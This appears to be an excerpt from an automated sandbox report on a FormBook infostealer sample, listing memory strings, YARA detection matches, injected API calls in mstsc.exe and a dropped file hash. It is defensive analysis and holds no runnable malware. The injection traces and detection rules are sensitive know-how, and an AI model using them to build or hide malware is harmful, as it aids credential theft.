Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/MrCylops
Source: powershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000003.361866562.00000000052D1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: Ms5nQdSz5l.exe, 00000000.00000002.242851987.0000000001380000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041A060 NtClose,	9_2_0041A060
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041A110 NtAllocateVirtualMemory,	9_2_0041A110
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00419F30 NtCreateFile,	9_2_00419F30
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00419FE0 NtReadFile,	9_2_00419FE0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01139910
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011399A0 NtCreateSection,LdrInitializeThunk,	9_2_011399A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139840 NtDelayExecution,LdrInitializeThunk,	9_2_01139840
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01139860
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011398F0 NtReadVirtualMemory,LdrInitializeThunk,	9_2_011398F0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139A00 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01139A00
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139A20 NtResumeThread,LdrInitializeThunk,	9_2_01139A20
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139A50 NtCreateFile,LdrInitializeThunk,	9_2_01139A50
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139540 NtReadFile,LdrInitializeThunk,	9_2_01139540
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011395D0 NtClose,LdrInitializeThunk,	9_2_011395D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139710 NtQueryInformationToken,LdrInitializeThunk,	9_2_01139710
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139780 NtMapViewOfSection,LdrInitializeThunk,	9_2_01139780
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011397A0 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_011397A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01139660
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011396E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_011396E0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139950 NtQueueApcThread,	9_2_01139950
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011399D0 NtCreateProcessEx,	9_2_011399D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139820 NtEnumerateKey,	9_2_01139820
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0113B040 NtSuspendThread,	9_2_0113B040
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011398A0 NtWriteVirtualMemory,	9_2_011398A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139B00 NtSetValueKey,	9_2_01139B00
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0113A3B0 NtGetContextThread,	9_2_0113A3B0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139A10 NtQuerySection,	9_2_01139A10
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139A80 NtOpenDirectoryObject,	9_2_01139A80
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0113AD30 NtSetContextThread,	9_2_0113AD30
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139520 NtWaitForSingleObject,	9_2_01139520
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139560 NtWriteFile,	9_2_01139560
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011395F0 NtQueryInformationFile,	9_2_011395F0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0113A710 NtOpenProcessToken,	9_2_0113A710
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139730 NtQueryVirtualMemory,	9_2_01139730
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0113A770 NtOpenThread,	9_2_0113A770
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139770 NtSetInformationFile,	9_2_01139770
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139760 NtOpenProcess,	9_2_01139760
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139FE0 NtCreateMutant,	9_2_01139FE0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139610 NtEnumerateValueKey,	9_2_01139610
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139650 NtQueryValueKey,	9_2_01139650
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01139670 NtQueryInformationProcess,	9_2_01139670
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011396D0 NtCreateKey,	9_2_011396D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9860 NtQuerySystemInformation,LdrInitializeThunk,	23_2_04FC9860
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9840 NtDelayExecution,LdrInitializeThunk,	23_2_04FC9840
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC95D0 NtClose,LdrInitializeThunk,	23_2_04FC95D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC99A0 NtCreateSection,LdrInitializeThunk,	23_2_04FC99A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9540 NtReadFile,LdrInitializeThunk,	23_2_04FC9540
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	23_2_04FC9910
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	23_2_04FC96E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC96D0 NtCreateKey,LdrInitializeThunk,	23_2_04FC96D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	23_2_04FC9660
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9650 NtQueryValueKey,LdrInitializeThunk,	23_2_04FC9650
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9A50 NtCreateFile,LdrInitializeThunk,	23_2_04FC9A50
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9FE0 NtCreateMutant,LdrInitializeThunk,	23_2_04FC9FE0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9780 NtMapViewOfSection,LdrInitializeThunk,	23_2_04FC9780
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9710 NtQueryInformationToken,LdrInitializeThunk,	23_2_04FC9710
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC98F0 NtReadVirtualMemory,	23_2_04FC98F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC98A0 NtWriteVirtualMemory,	23_2_04FC98A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FCB040 NtSuspendThread,	23_2_04FCB040
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9820 NtEnumerateKey,	23_2_04FC9820
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC95F0 NtQueryInformationFile,	23_2_04FC95F0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC99D0 NtCreateProcessEx,	23_2_04FC99D0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9560 NtWriteFile,	23_2_04FC9560
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9950 NtQueueApcThread,	23_2_04FC9950
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FCAD30 NtSetContextThread,	23_2_04FCAD30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9520 NtWaitForSingleObject,	23_2_04FC9520
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9A80 NtOpenDirectoryObject,	23_2_04FC9A80
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9670 NtQueryInformationProcess,	23_2_04FC9670
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9A20 NtResumeThread,	23_2_04FC9A20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9610 NtEnumerateValueKey,	23_2_04FC9610
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9A10 NtQuerySection,	23_2_04FC9A10
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9A00 NtProtectVirtualMemory,	23_2_04FC9A00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FCA3B0 NtGetContextThread,	23_2_04FCA3B0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC97A0 NtUnmapViewOfSection,	23_2_04FC97A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9770 NtSetInformationFile,	23_2_04FC9770
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FCA770 NtOpenThread,	23_2_04FCA770
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9760 NtOpenProcess,	23_2_04FC9760
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9730 NtQueryVirtualMemory,	23_2_04FC9730
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FCA710 NtOpenProcessToken,	23_2_04FCA710
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FC9B00 NtSetValueKey,	23_2_04FC9B00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AEA060 NtClose,	23_2_00AEA060
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AEA110 NtAllocateVirtualMemory,	23_2_00AEA110
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AE9FE0 NtReadFile,	23_2_00AE9FE0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AE9F30 NtCreateFile,	23_2_00AE9F30

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 0_2_0181C2B0	0_2_0181C2B0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 0_2_01819990	0_2_01819990
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041E1A2	9_2_0041E1A2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00409E40	9_2_00409E40
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FF900	9_2_010FF900
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01114120	9_2_01114120
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1002	9_2_011B1002
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110B090	9_2_0110B090
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C20A8	9_2_011C20A8
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C28EC	9_2_011C28EC
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C2B28	9_2_011C2B28
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112EBB0	9_2_0112EBB0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BDBD2	9_2_011BDBD2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C22AE	9_2_011C22AE
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C2D07	9_2_011C2D07
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F0D20	9_2_010F0D20
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C1D55	9_2_011C1D55
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122581	9_2_01122581
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C25DD	9_2_011C25DD
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110D5E0	9_2_0110D5E0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110841F	9_2_0110841F
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BD466	9_2_011BD466
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C1FF1	9_2_011C1FF1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BD616	9_2_011BD616
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01116E30	9_2_01116E30
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C2EF7	9_2_011C2EF7
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05051D55	23_2_05051D55
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB20A0	23_2_04FB20A0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9B090	23_2_04F9B090
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9841F	23_2_04F9841F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_05041002	23_2_05041002
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F9D5E0	23_2_04F9D5E0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FB2581	23_2_04FB2581
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F80D20	23_2_04F80D20
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA4120	23_2_04FA4120
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04F8F900	23_2_04F8F900
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FA6E30	23_2_04FA6E30
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FBEBB0	23_2_04FBEBB0
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AEE1A2	23_2_00AEE1A2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AD2D90	23_2_00AD2D90
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AD9E40	23_2_00AD9E40
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AD2FB0	23_2_00AD2FB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe 8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D

Source: C:\Windows\SysWOW64\mstsc.exe	Code function: String function: 04F8B150 appears 35 times
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: String function: 010FB150 appears 35 times

Source: Ms5nQdSz5l.exe, 00000000.00000002.272067090.000000000C130000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000000.00000002.272067090.000000000C130000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000000.00000000.223690013.0000000000CF2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameInvalidCastException.exe> vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000000.00000002.242851987.0000000001380000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000000.00000002.270256208.000000000C030000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSimpleUI.dll( vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000009.00000002.376511036.00000000006D2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameInvalidCastException.exe> vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000009.00000003.244547580.000000000104F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Ms5nQdSz5l.exe
Source: Ms5nQdSz5l.exe, 00000009.00000002.392045961.00000000030C3000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemstsc.exej% vs Ms5nQdSz5l.exe

Source: Ms5nQdSz5l.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
